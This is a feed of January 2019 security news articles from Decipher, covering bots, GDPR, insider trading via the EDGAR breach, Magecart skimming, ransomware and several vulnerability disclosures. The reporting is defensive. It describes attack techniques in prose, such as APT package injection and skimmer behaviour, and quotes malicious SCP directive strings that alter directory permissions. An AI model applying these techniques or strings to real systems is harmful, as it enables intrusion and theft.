<![CDATA[Decipher]]> https://decipher.sc Decipher is an independent editorial site that takes a practical approach to covering information security. Through news analysis and in-depth features, Decipher explores the impact of the latest risks and provides informative and educational material for readers curious about how security affects our world. Wed, 23 Jan 2019 00:00:00 -0500 en-us info@decipher.sc (Amy Vazquez) Copyright 2019 3600 <![CDATA[Tackling Twitter Bots With Biometrics]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/tackling-twitter-bots-with-biometrics https://duo.com/decipher/tackling-twitter-bots-with-biometrics Wed, 23 Jan 2019 00:00:00 -0500

Twitter, like a lot of platforms and services, is facing something of an identity crisis. Not in the traditional, Why are we all here sense, but in the ultra-modern, Who is running the accounts on our platform, sense.

From the beginning, Twitter’s creators made the decision not to require real names on the service. It’s a policy that’s descended from older chat services, message boards and Usenet newsgroups and was designed to allow users to express themselves freely. Free expression is certainly one of the things that happens on Twitter, but that policy has had a number of unintended consequences, too.

The service is flooded with bots, automated accounts that are deployed by a number of different types of users, some legitimate, others not so much. Many companies and organizations use automation in their Twitter accounts, especially for customer service. But a wide variety of malicious actors use bots, too, for a lot of different purposes. Governments have used bots to spread disinformation for influence campaigns, cybercrime groups employ bots as part of the command-and-control infrastructure for botnets, and bots are an integral part of the cryptocurrency scam ecosystem. This has been a problem for years on Twitter, but only became a national and international issue after the 2016 presidential election.

Twitter executives are keenly aware of this problem and the company has been under pressure from legislators, regulators, and individuals to get a handle on the proliferation of spammy, deceptive, and outright fake accounts. While the company has back-end systems to detect abuse and has public policies about the ways in which automation can be used and what actions will result in account suspension, positively identifying humans on the service necessarily needs to happen on an individual basis. The overwhelming majority of Twitter usage happens on mobile platforms, and many mobile devices have built-in biometric authentication mechanisms that could be used to separate humans from machines.

Twitter CEO Jack Dorsey said this week that he sees potential in biometric authentication as a way to help combat manipulation and increase trust on the platform.

“One of the things we’re focused on right now is how do we clearly identify the humans on the service, and even that is complicated because scripting gets more and more sophisticated. Folks can script mobile app, not just the web not just the programming interface that’s meant for developers,” Dorsey said in an interview on The Bill Simmons Podcast that was published Wednesday.

“If we can utilize technologies like Face ID or Touch ID or some of the biometric things that we find on our devices today to verify that this is a real person, then we can start labeling that and give people more context for what they’re interacting with and ideally that adds some more credibility to the equation. It is something we need to fix. We haven’t had strong technology solutions in the past, but that’s definitely changing with these supercomputers we have in our pockets now.”

“The fallback is the tricky bit. If one exists, then Touch ID/Face ID might be helpful in identifying that there is a human behind an account, but not necessarily the reverse."

Plenty of mobile apps already utilize the Touch ID or Face ID systems for authentication and those methods have a number of advantages, including the fact that the individual’s biometric data is stored on the device itself in the Secure Enclave and isn’t sent to Apple’s servers. And in the specific use case that Dorsey describes, requiring or suggesting the use of biometric authentication on a trusted device could help positively identify account holders as humans.

However, there could be some obstacles. Not everyone has an iOS device (although some Android phones have biometric sensors, too), so there would need to be a secondary authentication method. And if people choose another authentication method, that choice can’t be seen as an indicator that the account is a bot.

“I think it's a step in the right direction in terms of making general authentication usable, depending on how it's implemented. But I'm not sure how much it will help the bot/automation issue. There will almost certainly need to be a fallback authentication method for users without an ios device. Bot owners who want to do standard authentication will use whichever method is easiest for them, so if a password-based flow is still offered, they'd likely default to that,” said Jordan Wright, an R&D engineer at Duo Labs who has done extensive research on Twitter bot behavior with his colleague Olabode Anise.

“The fallback is the tricky bit. If one exists, then Touch ID/Face ID might be helpful in identifying that there is a human behind an account, but not necessarily the reverse - that a given account is not human because it doesn't use Touch ID.”

Dorsey said he sees other benefits from the potential use of the technology, as well: helping to restore trust in the service.

“Something like Face ID to me is a very thoughtful approach because Apple, when they created this and a bunch of other standards that ensued, a lot of the technology is local. There are no backdoors into it. Security is a constantly evolving thing of course. I think it’s important that people have control over their own security so the local aspect of it is critical. It’s not networked, it’s not accessible by Apple or third parties. But I think the most important aspect of it is we get behind this principle of earning trust,” Dorsey said.

“It’s easy to go to one method of earning trust which is transparency, but there’s so many methods of earning trust.”

]]>
<![CDATA[Flaw in APT Utility Allows Malicious Package Installation]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/flaw-in-apt-utility-allows-malicious-package-installation https://duo.com/decipher/flaw-in-apt-utility-allows-malicious-package-installation Tue, 22 Jan 2019 00:00:00 -0500

A couple of popular Linux distributions have a vulnerability in the main package-management interface that an attacker could use to trick a user into installing a malicious package that would then give the attacker root access on the target machine.

The vulnerability is in the APT package manager, which handles the way that software packages are downloaded and installed on Linux systems, including Debian and Ubuntu. Researcher Max Justicz discovered a flaw in APT that involves the way that the utility handles redirects during the installation process that an attacker on the network could exploit to get root privileges on a victim’s machine.

Several versions of Debian and Ubuntu are vulnerable to the bug, and the maintainers of both distributions have released updated versions that fix the issue. Ubuntu 18.10, Ubuntu 18.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 14.04 LTS all are vulnerable. Debian 1.4.9 is the patched version for that distribution.

“The code handling HTTP redirects in the HTTP transport method doesn't properly sanitize fields transmitted over the wire. This vulnerability could be used by an attacker located as a man-in-the-middle between APT and a mirror to inject malicious content in the HTTP connection,” the Debian advisory says.

“This content could then be recognized as a valid package by APT and used later for code execution with root privileges on the target machine.”

In the advisory, Justicz laid out a technique that an attacker with a man-in-the-middle position could use in order to install a malicious package on a vulnerable Debian system. The method relies on the fact that a specific file is installed in a known location.

“In my proof of concept, because I chose to inject the 201 URI Done response right away, I had to deal with the fact that no package had actually been downloaded yet. I needed a way to get my malicious .deb onto the system for use in the Filename parameter,” Justicz wrote.

“To do this, I took advantage of the fact that the Release.gpg file pulled during apt update is both malleable and installed into a predictable location. Specifically, Release.gpg contains ASCII-armored PGP signatures...But apt’s signature validation process is totally fine with the presence of other garbage in that file, as long as it doesn’t touch the signatures. So I intercepted the Release.gpg response and prepended it with my malicious deb.”

One of the foundational problems that enables the exploitation of this vulnerability is the update servers delivering packages over HTTP, rather than HTTPS, be default. Although the legitimate packages themselves are signed, an attacker with a privileged network position could use Justicz’s vulnerability and others like it to get a malicious package onto a victim’s computer. Justicz recommended that maintainers use HTTPS as the default transport mechanism for updates to help protect against these attacks.

“Yes, a malicious mirror could still exploit a bug like this, even with https. But I suspect that a network adversary serving an exploit is far more likely than deb.debian.org serving one or their TLS certificate getting compromised,” Justicz wrote.

“Supporting http is fine. I just think it’s worth making https repositories the default – the safer default – and allowing users to downgrade their security at a later time if they choose to do so.”

]]>
<![CDATA[France CNIL Fines Google, Forced Consent Violates GDPR]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/france-cnil-fines-google-forced-consent-violates-gdpr https://duo.com/decipher/france-cnil-fines-google-forced-consent-violates-gdpr Mon, 21 Jan 2019 00:00:00 -0500

When the General Data Protection Regulation went into effect last May, the big question was whether European regulators would take advantage of the greater powers to impose heavy penalties on violators. A heavy fine would send a strong message to both the offending company as well as other companies that privacy and data collection can’t happen without clear, unambiguous consent from the users.

France’s National Data Protection Commission (CNIL) fined Google €50 million ($57 million) under GDPR for making it too difficult for users to understand and manage preferences on how their personal information is used. The original complaints were filed back in May by privacy advocacy groups None of Your Business (led by Austrian privacy lawyer Max Schrems) and La Quadrature du Net.

“The amount decided and the publicity of the fine are justified by the severity of the infringements observed regarding the essential principles of GDPR: transparency, information and consent,” CNIL said in the English version of its decision. A penalty notice in French outlined the details of the investigation and the fine.

“It is important that the authorities make it clear that simply claiming to be [GDPR] compliant is not enough,” said Nyob chairman Max Schrems.

The complaints alleged that Google were railroading users into consenting into data processing without fully understanding what that meant. Google secured “forced consent” from Android users by implying that services would not be available unless the terms and conditions are accepted. CNIL concluded that Google did not transparently communicate the scope of data processing used for targeted advertisements, and left consumers uninformed about how their information would be used. Google didn’t concisely explain that personalized ads run across multiple services, including YouTube, Google Maps, and search.

“Users are not able to fully understand the extent of the processing operations carried out by Google,” CNIL said.

Clarity and Consent

The fact that users have to perform five or six actions just to find relevant privacy controls and information about what Google intended to with the data was a problem. “Essential information, such as the data processing purposes, the data storage periods or the categories of personal data used for the ads personalization, are excessively disseminated across several documents, with buttons and links on which it is required to click to access complementary information,” CNIL says.

During account creation on an Android phone the setting for allowing ad personalization is pre-checked by default. This violated GDPR as it defines unambiguous consent as the user purposefully selecting—opt-in—to such settings.

“This type of procedure leads the user to give global consent... but the consent is not ‘specific’ as the GDPR requires,” CNIL said.

The existing documentation was also “too generic and vague” and didn’t convey to users the “particularly massive and intrusive” systems in place for personalizing ads. It wasn’t clear how long data will be stored, for example.

Regulators' Scrutiny

CNIL said it considered the fact that Google was still in violation of the law when setting the fine, as well as the fact that Google’s Android had a dominant market position.

“Moreover, the violations are continuous breaches of the Regulation as they are still observed to date. It is not a one-off, time-limited, infringement,” CNIL said.

“Each day thousands of French users create a Google account on their smartphones. As a result the company has a special responsibility when it comes to respecting their obligations in this domain.”

GDPR gives data protection authorities the authority to impose fines of up to €20 million ($23 million) or 4 percent of an organization's annual global revenue—whichever is greater. Google’s parent company Alphabet reported annual global revenue of $110.8 billion in 2017, which means regulators could have gone as high as $4.4 billion in fines. Regulators can also decide to revoke the company’s ability to process individuals' personal data.

CNIL’s decision is the largest fine against Google to date—although it is worth noting there have been only a handful of enforcement actions since the law went into effect eight months ago. The previous largest fine was for €400,000 fine ($454,426) against a Portuguese hospital. It is too soon to know if other regulators will follow CNIL’s lead, or if this fine was just a one-off event.

Google told the Washington Post it is “deeply committed to meeting those expectations and the consent requirements of the GDPR.” It has not said whether it plans to appeal the fine.

"We are very pleased that for the first time a European data protection authority is using the possibilities of GDPR to punish clear violations of the law," said Schrems, Nyob chairman. "Following the introduction of GDPR, we have found that large corporations such as Google simply 'interpret the law differently' and have often only superficially adapted their products. It is important that the authorities make it clear that simply claiming to be compliant is not enough.”

More Enforcement on Way

The actual amounts tell only part of the privacy regulation story. The true sign of GDPR's power will be whether the rules can change data privacy and collection practices. Companies with business models that involve data collection and ad personalization are watching carefully how European regulators enforce the new rules.

Even though the regulation ostensibly applies only to European companies, companies based outside of the EU still need to comply with GDPR if they want to have European users. And users in countries that don't have strong privacy laws—such as the United States—benefit from the fact that companies have to change their processes for EU residents.

CNIL's action is just one of many. There are other complaints against Google pending in other countries. European Union citizens (or groups representing them) can file complaints with their country’s data regulators, and each country investigates and sets fines independently. Consumer groups filed complaints in seven countries back in November over how Google obtains permission from Android users on collecting location data.

Google isn't the only one in the crosshairs, either. Nyob has already filed related complaints against Instagram, WhatsApp, and Facebook. Last week, it filed new complaints in Austria against eight companies, including Apple, Amazon, Netflix, Spotify, and YouTube for not being able to tell users what data was collected and how it was used. Under the law, users have the right to obtain data collected on them from websites, what it was used for, and who it was shared with. In many cases, users only got the raw data, but did not know who saw the information, Schrems said.

Schrems will be carefully scrutinizing how companies handle user privacy. “In 1995 the EU already passed data protection laws, but they were simply ignored by the big players. We now have to make sure this does not happen again with GDPR – so far many only seem to be superficially compliant,” Schrems said on Nyob's site.

]]>
<![CDATA[Criminals Stole SEC Filings in Insider Trading Scheme]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/criminals-stole-sec-filings-in-insider-trading-scheme https://duo.com/decipher/criminals-stole-sec-filings-in-insider-trading-scheme Fri, 18 Jan 2019 00:00:00 -0500

The Securities and Exchange Commission’s civil complaint outlining the details of an international insider trading scheme is an object lesson in how cybercriminals can monetize any information, not just customer records or intellectual property.

"They targeted the Securities and Exchange Commission with a series of sophisticated and relentless cyber-attacks, stealing thousands of confidential EDGAR filings from the Commission’s servers and then trading on the inside information in those filings before it was known to the market, all at the expense of the average investor," said U.S. Attorney Craig Carpenito, of the U.S. Attorney’s Office of New Jersey.

The Department of Justice charged two individuals for breaching the SEC’s Electronic Data Gathering, Analysis and Retrieval (EDGAR) system, stealing thousands of files containing confidential financial information, and sharing them with different groups of traders who bought and sold stocks based on that information. The EDGAR system holds financial records and related documents for publicly traded companies, and its test filing application lets companies submit files to ensure documents are being processed correctly. While these filings typically do not contain sensitive, non-public information, the SEC said in its complaint that sometimes companies submit documents with same or similar information that will appear in the actual filing.

This meant that some of the test files contained “earning results and material information that the companies had not yet released to the public,” the SEC said.

Information is Valuable

In this insider trading scheme, the attackers wanted early access to information that was going to become public eventually. They weren't looking for personal information that could be sold to identity thieves or financial data to resell on carder forums. They weren't after intellectual property as part of economic espionage. The success of the operation depended on timing—the thieves needed to get the information to rogue traders with enough time to make trades on stocks that would rise or fall once the information became public.

“In one instance, a test filing for ‘Public Company 1’ was uploaded to the EDGAR servers at 3:32 p.m. (EDT) on May 19, 2016. Six minutes later, the defendants stole the test filing and uploaded a copy to the Lithuania server. Between 3:42 p.m. and 3:59 p.m., a conspirator purchased approximately $2.4 million worth of shares of Public Company 1. At 4:02 p.m., Public Company 1 released its second quarter earnings report and announced that it expected to deliver record earnings in 2016. Over the next day, the conspirator sold all the acquired shares in Public Company 1 for a profit of more than $270,000,” the Department of Justice said in its release.

The Justice Department had charged the same defendant back in 2015 with a similar attack: the breach of newswire distribution companies that allowed thieves to steal press releases before they were publicly announced. The information from those press releases was also used by rogue securities traders to make illegal trades.

Enterprise security teams need to regularly assess what information needs to be protected, and which processes need extra security. The focus is often on the obvious—personal information and the "crown jewels" such as the list of customers, source code, top-secret recipe, and so on. In this case, criminals relied on the fact that some companies were submitting sensitive information in what was essentially a testing application. While the company didn't lose money directly (since the traders benefitted from making the transactions at the right time), the mistake resulted in a windfall for the group engaged in this operation.

The traders made transactions before at least 157 earnings releases between May and October 2016, to the tune of at least $4.1 million in profit, the Department of Justice said.

Investigations Take Time

The attackers initially gained access to the EDGAR system by sending phishing emails to SEC employees that appear to have originated from other SEC employees, and then infecting the victims’ computers with malware. They gained access to the test filings through directory traversal attacks, which lets attackers access restricted directories and execute commands outside of the web server’s root directory.

The methods used weren’t “sophisticated” in the sense of using exotic or unknown techniques, but they were still effective.

The attackers lost access to the test filing application in October 2016, after the SEC detected the breach and fixed the issues in EDGAR. They attempted to re-compromise SEC computers and regain access to EDGAR by sending phishing emails “spoofed to appear to have been sent by SEC security personnel”—attempts that continued into early 2017.

“None of the post-October 2016 efforts appear to have led to access to test filings containing material nonpublic information or to trading,” the Department of Justice said.

Even though the SEC fixed the issues in October 2016, it wasn’t until almost a year later when the agency realized the stolen documents had been used for insider trading. It sometimes take a while for investigators to figure out what the attackers did, or how the information was abused.

]]>
<![CDATA[When Privacy Goes to Washington]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/when-privacy-goes-to-washington https://duo.com/decipher/when-privacy-goes-to-washington Fri, 18 Jan 2019 00:00:00 -0500

It’s been nearly a month since the United States had a functioning federal government, and precious little of consequence has happened on Capitol Hill in that time. But one of the issues that has sustained a level of interest throughout the shutdown is consumer data privacy, with Sen. Marco Rubio introducing a new bill this week to establish federal privacy regulations, and now Apple CEO Tim Cook is pushing for government oversight of data brokers.

Rubio’s bill is one of a number of privacy related pieces of legislation that have been introduced in Congress in recent months. Like a couple of the other proposed measures, the American Data Dissemination Act envisions the Federal Trade Commission playing a major role in the process. In his bill, Rubio (R-Fla.) directs the FTC to develop a broad set of regulations for the way that Internet service providers handle user data, with the Privacy Act of 1974 as the basis. That law dictates the way that federal agencies can collect, store, and distribute personal information, but doesn’t apply to private entities.

Rubio’s bill requires the FTC to “submit to the appropriate committees of Congress detailed recommendations for privacy requirements that Congress could impose on covered providers that would be substantially similar, to the extent practicable, to the requirements applicable to agencies under the Privacy Act of 1974.”

The introduction of the ADD Act follows by a month the introduction of the Data Care Act, a bill with 15 Democratic sponsors that would establish the FTC as the enforcement agency for a new set of privacy rules to govern the way companies protect customer information. That bill provides substantial fines for violations and has a number of requirements, including one that prohibits service providers from using customer data in a way that “will benefit the online service provider to the detriment of an end user”.

Sen. Ron Wyden (D-Ore.) also has released a discussion draft of another privacy bill. Wyden’s Consumer Data Protection Act uses the FTC for enforcement and would fine companies that violate the rules up to four percent of their annual revenue. For his part, Rubio said it’s time that Congress take some action on consumer privacy, something that has been done on a state-by-state basis or through industry regulation.

“There has been a growing consensus that Congress must take action to address consumer data privacy,” Rubio said. “However, I believe that any efforts to address consumer privacy must also balance the need to protect the innovative capabilities of the digital economy that have enabled new entrants and small businesses to succeed in the marketplace.”

"We believe the Federal Trade Commission should establish a data-broker clearinghouse, requiring all data brokers to register."

In his bill, Rubio requires services providers to give consumers access to any records the provider holds upon request and have a mechanism for deleting records when necessary or required. Apple’s Cook has similar ideas. In an opinion piece in Time this week, Cook criticized the sale and resale of consumer information through the vast network of data brokers, a practice that’s largely invisible to consumers and unregulated by the government. Cook recommended that the FTC have responsibility for regulating data brokers, a task for which the commission probably is better suited than establishing privacy regulations.

“Meaningful, comprehensive federal privacy legislation should not only aim to put consumers in control of their data, it should also shine a light on actors trafficking in your data behind the scenes. Some state laws are looking to accomplish just that, but right now there is no federal standard protecting Americans from these practices,” Cook wrote.

Many consumers are unaware that data brokers even exist, let alone how they buy, store, and sell large chunks of personal information. These companies don’t fall under most existing regulations for financial firms or other companies that hold sensitive data, so Cook’s proposal is for a regulatory body to oversee data brokers and an option for consumers to delete data whenever they choose.

“That’s why we believe the Federal Trade Commission should establish a data-broker clearinghouse, requiring all data brokers to register, enabling consumers to track the transactions that have bundled and sold their data from place to place, and giving users the power to delete their data on demand, freely, easily and online, once and for all,” Cook wrote.

]]>
<![CDATA[Decipher Podcast: Nate Cardozo]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-nate-cardozo https://duo.com/decipher/decipher-podcast-nate-cardozo Thu, 17 Jan 2019 00:00:00 -0500

Dennis Fisher talks with Nate Cardozo, senior information security counsel at the EFF, about a proposal from the UK's spy agency, GCHQ, that would insert a backdoor into encrypted communications by adding a "ghost", or invisible third party, to two-party conversations. The proposal is the latest in a long line of ideas to weaken or cripple encryption systems in the name of easier access for law enforcement and Dennis and Nate discuss the risks of the ghost method as well as what it could portend for users in other countries.

]]>
<![CDATA[Magecart Targets Advertising Supply Chain in New Attack]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/magecart-targets-advertising-supply-chain-in-new-attack https://duo.com/decipher/magecart-targets-advertising-supply-chain-in-new-attack Wed, 16 Jan 2019 00:00:00 -0500

A new faction of the infamous Magecart cybercrime group was able to compromise a French online advertising provider and install a script that was then propagated to ecommerce sites that loaded code from the ad provider, an attack that could be a sign of things to come with other attack groups.

The compromise of Adverline took place at the end of December and was the work of a team that researchers from RiskIQ are calling Magecart Group 12, a group that hasn’t been documented before. Magecart is an amorphous and loosely connected network of groups that use a variety of techniques to inject a web skimmer into ecommerce and other sites in order to steal payment card information. Magecart has been in operation for at least four years and has been tied to a number of major breaches, including one at Ticketmaster UK. There are several individual groups that fall under the Magecart umbrella, and they generally have different modes of operation and targets.

Group 12 is a newly identified subset of Magecart that has been conducting operations since about September, using typical injection and skimming techniques. But in December, the group hit a target that provided it with the opportunity for much broader reach for its data theft: Adverline. The company provides advertising services for various sites, and the Magercart attackers were able to compromise a JavaScript library that Adverline provides to third-party sites.

“Unlike other online skimmer groups that directly compromise their target’s shopping cart platforms, Magecart Groups 5 and 12 attack third-party services used by e-commerce websites by injecting skimming code to JavaScript libraries they provide. This enables all websites embedded with the script to load the skimming code. Targeting third-party services also helps expand their reach, allowing them to steal more data,” Chaoying Liu and Joseph C. Chen of Trend Micro wrote in an analysis of the compromise.

“At the time of our research, the websites embedded with Adverline’s retargeting script loaded Magecart Group 12’s skimming code, which, in turn, skims payment information entered on webpages then sends it to its remote server.”

This is a much more efficient tactic for Magecart than going after each shopping cart site individually. By targeting a third party that provides resources to a wide customer base, the attackers greatly increase their potential financial rewards. Other Magecart groups have employed a similar technique in the past, targeting third-party library providers who supply plug-ins for ecommerce sites. Group 12 has put together a comprehensive attack infrastructure that allows it to deliver its malicious code directly.

“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis."

“Group 12 built out its infrastructure in September 2018; domains were registered, SSL certificates were set up through LetsEncrypt, and the skimming backend was installed. Group 12 doesn’t just inject the skimmer code by adding a script tag—the actors use a small snippet with a base64 encoded URL for the resource which is decoded at runtime and injected into the page,” Yonathan Klijnsma, head of threat research at RiskIQ, who has been following Magecart for several years, wrote in a post on the new compromise.

“The skimmer code for Group 12 has an interesting twist; it protects itself from deobfuscation and analysis by performing an integrity check on itself. The actual injection script comes in two stages, which both perform a self-integrity check.”

The skimmer that Group 12 used in the compromise of Adverline performed a variety of checks after installation, looking to see if it was on a checkout page, if certain words are present in the URL, and whether the code is on a mobile device. All of this is designed to ensure that the skimmer is in the correct place and has a chance to do its job. If the script detects that it’s on a good site, it will execute the skimmer.

“Once any value instead of empty is entered on the webpage’s typing form, the script will copy both the form name and values keyed in by the user. Stolen payment and billing data is stored in a JavaScript LocalStorage with the key name Cache. The copied data is Base64-encoded. It also generates a random number to specify individual victims, which it reserves into LocalStorage with key name E-tag. A JavaScript event ‘unload’ is triggered whenever the user closes or refreshes the payment webpage,” the Trend Micro researchers said.

The Trend Micro team, who discovered the Adverline compromise, informed the company of the attack and Adverline was able to address the issue. The command-and-control domains involved in the attack are no longer functioning.

]]>
<![CDATA[Decades-Old Flaws Found in SCP Clients]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decades-old-flaws-found-in-scp-clients https://duo.com/decipher/decades-old-flaws-found-in-scp-clients Tue, 15 Jan 2019 00:00:00 -0500

The SCP clients in a number of Linux distributions have a pair of vulnerability that an attacker could use to write arbitrary malicious files to the target directory on the client machine and change the permissions on the directory to allow further compromises. The bugs are 35 years old, but have just now been brought to light.

SCP (secure copy protocol) is an older network protocol that’s implemented in many Linux distributions. It uses SSH for file transfers and users can employ SCP to upload files to or download files from a remote server. One of the vulnerabilities in SCP, discovered by researcher Harry Sintonen of F-Secure, is a result of the clients failing to verify the validity of the objects that are returned to it after a download request. The upshot of that is that an attacker who controls the server, or has a man-in-the-middle position on the network, can drop arbitrary files into the directory from which the user runs SCP.

The vulnerability affects the SCP client implementations in Debian, Red Hat, and SUSE Linux, OpenSSH version 7.9 and earlier, as well as some versions of WinSCP.

“Due to the scp implementation being derived from 1983 rcp, the server chooses which files/directories are sent to the client. However, scp client only perform cursory validation of the object name returned (only directory traversal attacks are prevented). A malicious scp server can overwrite arbitrary files in the scp client target directory. If recursive operation (-r) is performed, the server can manipulate subdirectories as well (for example overwrite .ssh/authorized_keys),” the advisory from Sintonen says.

A similar vulnerability in the SCP client in SSH was disclosed in 2000, a directory traversal bug that was fixed at the time.

The second vulnerability that Sintonen discovered lies in the way that SCP clients check the name of the directory to which files are being transferred.

“The scp client allows server to modify permissions of the target directory by using empty ("D0777 0 \n") or dot ("D0777 0 .\n") directory name,” the advisory says.

That vulnerability affects OpenSSH and WinSCP version 5.13 and earlier.

Sintonen also uncovered two less-severe vulnerabilities that can be used to manipulate the output of the client and potentially disguise the inclusion of other files in a download from the server.

]]>
<![CDATA[Researchers Uncover Serious Flaws in Access Management System]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/researchers-uncover-serious-flaws-in-access-management-system https://duo.com/decipher/researchers-uncover-serious-flaws-in-access-management-system Mon, 14 Jan 2019 00:00:00 -0500

Researchers have uncovered a number of vulnerabilities in a popular building access-control application called PremiSys, including hardcoded credentials that could allow an attacker to add new users, delete existing users, or perform many other administrative functions on the system.

The vulnerabilities are in IDenticard’s PremiSys version 3.1.190 and the presence of the hardcoded credentials creates an easily exploitable weakness for an attacker to gain access to the system. Jimi Sebree, senior research engineer at Tenable Security, discovered the bugs and said that there’s no method in the application through which administrators can change the hardcoded username and password.

“As it turns out, this hardcoded backdoor allows attackers to add new users to the badge system, modify existing users, delete users, assign permission, and pretty much any other administrative function,” Sebree said in a blog post detailing the vulnerability.

The issue lies in the PremiSysWCFService module, which handles a variety of tasks, including some authentication functions. Sebree found that there’s a function inside the module that contains the hardcoded credentials.

“Users are not permitted to change these credentials. The only mitigation appears to be to limit traffic to this endpoint, which may or may not have further impact on the availability of the application itself,” Tenable’s advisory says.

“These credentials can be used by an attacker to dump contents of the badge system database, modify contents, or other various tasks with unfettered access.”

PremiSys is a physical access-management system that includes video surveillance features, door control, and card management. Along with the hardcoded credentials, Sebree also found a few other bugs including the use of a weak encryption method to protect user credentials, a hardcoded password protecting local backup files, and default credentials for the local database that installs with the system.

Sebree said that typically an attacker would need to have local access to the PremiSys system in order to go after the vulnerabilities he discovered.

“While possible for these systems to be accessible over the internet, it is unlikely. In most cases, an attacker would need access to the network the badge system sits on in order to exploit the vulnerabilities,” Sebree said via email.

The Tenable Research team attempted to contact IDenticard several times after discovering the vulnerabilities in September, but got no response. The company then sent the vulnerability information to CERT, which also tried to contact IDenticard, to no avail.

Sebree suggested that organizations ensure their networks are segmented so that the physical access system isn’t directly integrated into the larger corporate network.

“Administrators should first double-check that these systems are not connected to the internet. They should also segment their network to ensure systems like PremiSys are isolated from internal and external threats as much as possible,” Sebree said.

]]>
<![CDATA[The Unholy Alliance of Emotet, TrickBot and the Ryuk Ransomware]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/the-unholy-alliance-of-emotet-trickbot-and-the-ryuk-ransomware https://duo.com/decipher/the-unholy-alliance-of-emotet-trickbot-and-the-ryuk-ransomware Fri, 11 Jan 2019 00:00:00 -0500

A recent spate of infections by the Ryuk ransomware in large organizations may be the work of attackers who are using a chain of malware, including Emotet and TrickBot, to gain footholds in target companies before then delivering the ransomware and demanding large Bitcoin payments.

Ryuk is a relatively new strain of ransomware, having emerged last summer, and hasn’t been too widely deployed yet. But it has some notable attributes, including some rather large ransom demands and its growing association with Emotet and TrickBot. A number of security research teams have been tracking the attackers behind these infections, and have found that while the group isn’t using Ryuk on all of the machines infected with Emotet or TrickBot, they’re having quite a bit of financial success with the organizations they are compromising. Researchers at CrowdStrike estimate that the group behind the attacks have pulled in more than $3.7 million in ransom since August.

The attack chain in these incidents typically begins with an infection by the Emotet malware somewhere in the target organization. This often happens through a phishing email with an infected attachment that delivers the malware once it’s opened. After the initial infection, the operator will at some point push the TrickBot malware as a payload to the Emotet-infected machine. TrickBot often is used to steal credentials and other data inside a network. The final stage in the infection operation is the delivery of the Ryuk ransomware, which will then encrypt selected files on the infected machines and drop notes demanding a Bitcoin payment. The ransom demand can vary, from one or two Bitcoin, to as high as 99, according to CrowdStrike’s analysis.

“Our tracking shows that the actors behind Emotet regularly drop malware executables composed of Trickbot and IcedID, among others. The Trickbot and IcedID payloads are observed to be dropped directly via the module loader. However, with the Ryuk ransomware module, it follows a different control-flow path,” an analysis by security firm Kryptos Logic says.

“Ryuk infections are seldom, if ever, dropped directly by Emotet. When the Ryuk module is delivered to a victim, it is done transiently through a Trickbot infection and other tools, not the original Emotet bot.”

"These code similarities are insufficient to conclude North Korea is behind Ryuk attacks."

The Ryuk ransomware has been used in a handful of high-profile infections, including one at the Tribune Publishing company in late December, and another at cloud hosting provider Data Resolution. Researchers say it appears that the operators of the TrickBot malware are being selective about how it’s used, with the same being true of the Ryuk ransomware.

“The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provide the malware to a limited number of cyber criminal actors to use in operations. This is partially evident through its use of 'gtags' that appear to be unique campaign identifiers used to identify specific TrickBot users,” Kimberly Goody, Jeremy Kennelly, Jaideep Natu, Christopher Glyer of FireEye wrote in an analysis of the campaign.

“In recent incidents investigated by our Mandiant incident response teams, there has been consistency across the gtags appearing in the configuration files of TrickBot samples collected from different victim networks where Ryuk was also deployed. The uniformity of the gtags observed across these incidents appears to be due to instances of TrickBot being propagated via the malware’s worming module configured to use these gtag values.”

There have been a number of analyses that have connected the Ryuk campaign to North Korean attackers, although some others have cast doubt on that assertion. Researchers at CrowdStrike and FireEye said that the Ryuk code was quite similar to the more common Hermes malware, and may actually be a derivative of it. Hermes has been used by APT38, an attack group associated with North Korea, but that doesn’t necessarily connect Ryuk to North Korea.

“Notably, while there have been numerous reports attributing Ryuk malware to North Korea, FireEye has not found evidence of this during our investigations. This narrative appears to be driven by code similarities between Ryuk and Hermes, a ransomware that has been used by APT38. However, these code similarities are insufficient to conclude North Korea is behind Ryuk attacks, as the Hermes ransomware kit was also advertised for sale in the underground community at one time,” the FireEye researchers said.

]]>
<![CDATA[Decipher Podcast: Stefan Tanase]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/decipher-podcast-stefan-tanase https://duo.com/decipher/decipher-podcast-stefan-tanase Thu, 10 Jan 2019 00:00:00 -0500

Dennis Fisher talks with Stefan Tanase, a principal security researcher at Ixia, about the concept of Internet Balkanization, the consequences of large-scale censorship for users, and how technical and policy experts can help address the problem.

]]>
<![CDATA[Bringing Security to USB Type-C, or More Limitations?]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/bringing-security-to-usb-type-c-or-more-limitations https://duo.com/decipher/bringing-security-to-usb-type-c-or-more-limitations Wed, 09 Jan 2019 00:00:00 -0500

As security programs go, the USB Type-C Authentication Program has a lofty goal: to create a cryptographic-based authentication scheme that would protect host systems from malicious USB chargers, cables, and devices.

USB Type-C is commonly found on notebooks, smartphones, and other connected devices because it allows faster data transfer and more power delivery than other USB interfaces. However, many enterprises disable the USB ports on corporate devices because adversaries are increasingly targeting USB devices and ports. A better approach would be to let enterprises whitelist permitted USB devices. Users want assurances that the charger or the public charging station they are using will not fry their devices. The USB Type-C Authentication Program, unveiled by the non-profit group USB Implementers Forum, would make it possible to check the device (or cable) is what it claims to be at the moment it is plugged in the USB port.

The dangers of USB-based atttacks range from malicious payloads on the USB devices which can load malware—inject keystrokes, install backdoors, emulate mouse movements, log events and data, and hijack traffic—onto the host system, to counterfiet cables and chargers which deliver too much (or too little) power and damage the system. Researchers have shown how plugging a device into a malicious power charging station could result in the device being infected with malware. Under this authentication program, OEMs and vendors will be able to certify their USB Type-C products are protected against commonly-used hardware attack methods and have not been modified.

